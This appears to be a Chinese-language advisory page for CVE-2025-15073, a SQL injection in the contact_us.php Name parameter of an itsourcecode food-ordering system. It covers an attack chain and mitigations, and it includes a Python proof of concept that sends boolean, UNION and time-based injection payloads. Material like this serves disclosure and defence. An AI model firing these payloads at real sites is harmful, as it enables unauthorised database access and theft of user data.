CVE-2025-15073 itsourcecode Online Frozen Foods Ordering System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15073

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Frozen Foods Ordering System 1.0

漏洞概述

CVE-2025-15073是itsourcecode Online Frozen Foods Ordering System 1.0中的一个高危SQL注入漏洞。该漏洞存在于contact_us.php文件的Name参数中，攻击者可以通过构造恶意SQL语句未经授权地访问数据库。此漏洞无需认证即可远程利用，CVSS评分达到7.3，属于高危级别。由于该漏洞已公开披露，攻击者可能已掌握利用方法，系统面临被入侵的严重风险。攻击者可以利用此漏洞获取敏感信息、修改数据或在某些情况下执行系统命令。

技术细节

该SQL注入漏洞位于Online Frozen Foods Ordering System 1.0的contact_us.php文件中的Name参数。攻击者通过在Name参数中注入恶意SQL代码，可以绕过应用程序的输入验证并执行任意SQL命令。漏洞的根本原因在于应用程序未对用户输入进行充分的参数化查询或输入过滤。攻击者可以使用UNION SELECT、布尔盲注、时间盲注等技术提取数据库中的敏感信息，包括用户凭据、财务数据等。由于该漏洞的网络可达性（AV:N）和无需认证（PR:N）的特性，攻击者可以从互联网远程发起攻击，无需任何前置条件。CVSS向量显示机密性、完整性和可用性影响均为低级别，但综合评分仍达到7.3。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统itsourcecode Online Frozen Foods Ordering System 1.0，访问contact_us.php页面

STEP 2

步骤2

攻击者分析页面功能，发现Name参数未进行充分的输入过滤和参数化查询

STEP 3

步骤3

攻击者构造恶意SQL注入载荷，通过Name参数提交到服务器

STEP 4

步骤4

服务器执行恶意SQL语句，攻击者获取数据库敏感信息或绕过认证

STEP 5

步骤5

根据数据库配置和权限，攻击者可能进一步横向移动或提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15073 SQL Injection PoC # Target: itsourcecode Online Frozen Foods Ordering System 1.0 # File: /contact_us.php # Parameter: Name import requests import sys from urllib.parse import urlencode target_url = "http://target.com/contact_us.php" # Basic SQL Injection PoC - Boolean Based payloads = [ "' OR '1'='1", "' OR '1'='1' --", "admin' OR '1'='1", "' UNION SELECT NULL--", "' AND SLEEP(5)--" ] def test_sql_injection(): print(f"[*] Testing CVE-2025-15073 SQL Injection") print(f"[*] Target: {target_url}") for payload in payloads: print(f"\n[+] Testing payload: {payload}") data = { 'Name': payload, 'Email': '[email protected]', 'Message': 'Test message' } try: response = requests.post(target_url, data=data, timeout=10) # Check for SQL error indicators sql_errors = [ 'mysql_fetch', 'mysqli_fetch', 'SQL syntax', 'MySQL', 'Warning', 'mysql_', 'syntax error' ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[!] SQL Error detected with payload: {payload}") print(f"[!] Error keyword found: {error}") return True print(f"[-] No obvious SQL error with this payload") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("\n[*] Basic PoC testing complete") print("[*] Manual verification recommended") return False if __name__ == "__main__": test_sql_injection()

影响范围

itsourcecode Online Frozen Foods Ordering System 1.0

防御指南

临时缓解措施

立即对contact_us.php文件中的Name参数实施输入验证，使用参数化查询替代字符串拼接方式处理数据库操作。在应用层部署WAF规则拦截SQL注入特征。在数据库层限制应用程序账户权限，避免使用高权限数据库账户。临时措施可包括禁用contact_us.php功能或设置IP白名单限制访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15073
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15073
3 Details https://www.cvedetails.com/cve/CVE-2025-15073/
4 VulDB https://vuldb.com/cve/CVE-2025-15073
5 Link https://github.com/24ggee/CVE/issues/1
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.338330
8 Link https://vuldb.com/?id.338330
9 Link https://vuldb.com/?submit.721321